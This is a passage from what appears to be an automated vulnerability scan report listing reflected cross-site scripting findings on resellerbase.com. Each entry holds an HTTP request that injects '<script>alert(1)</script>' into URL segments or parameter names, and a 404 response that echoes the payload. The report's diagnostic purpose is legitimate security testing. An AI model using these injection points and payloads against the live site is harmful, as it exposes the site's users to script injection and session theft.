User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale32bfa<script>alert(1)</script>734f6067136/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.3882. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a4f0<script>alert(1)</script>c6b1398899d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes1a4f0<script>alert(1)</script>c6b1398899d/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes1a4f0<script>alert(1)</script>c6b1398899d/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.3883. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ad581<script>alert(1)</script>4d96bdea618 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmosad581<script>alert(1)</script>4d96bdea618/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmosad581<script>alert(1)</script>4d96bdea618/images/review/ was not found on this server.</p>
...[SNIP]...

2.3884. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 904ac<script>alert(1)</script>4dc7f25a999 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images904ac<script>alert(1)</script>4dc7f25a999/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images904ac<script>alert(1)</script>4dc7f25a999/review/ was not found on this server.</p>
...[SNIP]...

2.3885. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1ce06<script>alert(1)</script>a5b3f105f1e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/review1ce06<script>alert(1)</script>a5b3f105f1e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review1ce06<script>alert(1)</script>a5b3f105f1e/ was not found on this server.</p>
...[SNIP]...

2.3886. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c0919<script>alert(1)</script>8f1ad67317e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/review/?c0919<script>alert(1)</script>8f1ad67317e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review/?c0919<script>alert(1)</script>8f1ad67317e=1 was not found on this server.</p>
...[SNIP]...

2.3887. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ee4b<script>alert(1)</script>46a0b06ea22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale5ee4b<script>alert(1)</script>46a0b06ea22/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale5ee4b<script>alert(1)</script>46a0b06ea22/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.3888. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d3c4b<script>alert(1)</script>533a1a5b5ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themesd3c4b<script>alert(1)</script>533a1a5b5ab/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themesd3c4b<script>alert(1)</script>533a1a5b5ab/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.3889. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ae9ad<script>alert(1)</script>67fa02479cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmosae9ad<script>alert(1)</script>67fa02479cd/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmosae9ad<script>alert(1)</script>67fa02479cd/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.3890. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b0b63<script>alert(1)</script>b7251b20e8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/imagesb0b63<script>alert(1)</script>b7251b20e8/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/imagesb0b63<script>alert(1)</script>b7251b20e8/review/0.gif was not found on this server.</p>
...[SNIP]...

2.3891. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e2009<script>alert(1)</script>befc4aa17cc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/reviewe2009<script>alert(1)</script>befc4aa17cc/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/reviewe2009<script>alert(1)</script>befc4aa17cc/0.gif was not found on this server.</p>
...[SNIP]...

2.3892. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1dca5<script>alert(1)</script>defbb570f36 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/review/0.gif1dca5<script>alert(1)</script>defbb570f36 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review/0.gif1dca5<script>alert(1)</script>defbb570f36 was not found on this server.</p>
...[SNIP]...

2.3893. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d84e7<script>alert(1)</script>731f3a01bd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/review/0.gif?d84e7<script>alert(1)</script>731f3a01bd5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review/0.gif?d84e7<script>alert(1)</script>731f3a01bd5=1 was not found on this server.</p>
...[SNIP]...

2.3894. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9730d<script>alert(1)</script>11b45b65099 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale9730d<script>alert(1)</script>11b45b65099/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale9730d<script>alert(1)</script>11b45b65099/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3895. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9738a<script>alert(1)</script>c1939642063 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes9738a<script>alert(1)</script>c1939642063/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes9738a<script>alert(1)</script>c1939642063/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3896. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2547e<script>alert(1)</script>8f5f09e3913 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos2547e<script>alert(1)</script>8f5f09e3913/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos2547e<script>alert(1)</script>8f5f09e3913/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3897. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 83cb9<script>alert(1)</script>9198d20764e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images83cb9<script>alert(1)</script>9198d20764e/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images83cb9<script>alert(1)</script>9198d20764e/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3898. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2b8ed<script>alert(1)</script>09bc5b8e85 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/review2b8ed<script>alert(1)</script>09bc5b8e85/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review2b8ed<script>alert(1)</script>09bc5b8e85/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3899. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 910db<script>alert(1)</script>ea1ae135363 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/review/search.php910db<script>alert(1)</script>ea1ae135363?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/review/search.php910db<script>alert(1)</script>ea1ae135363?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3900. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
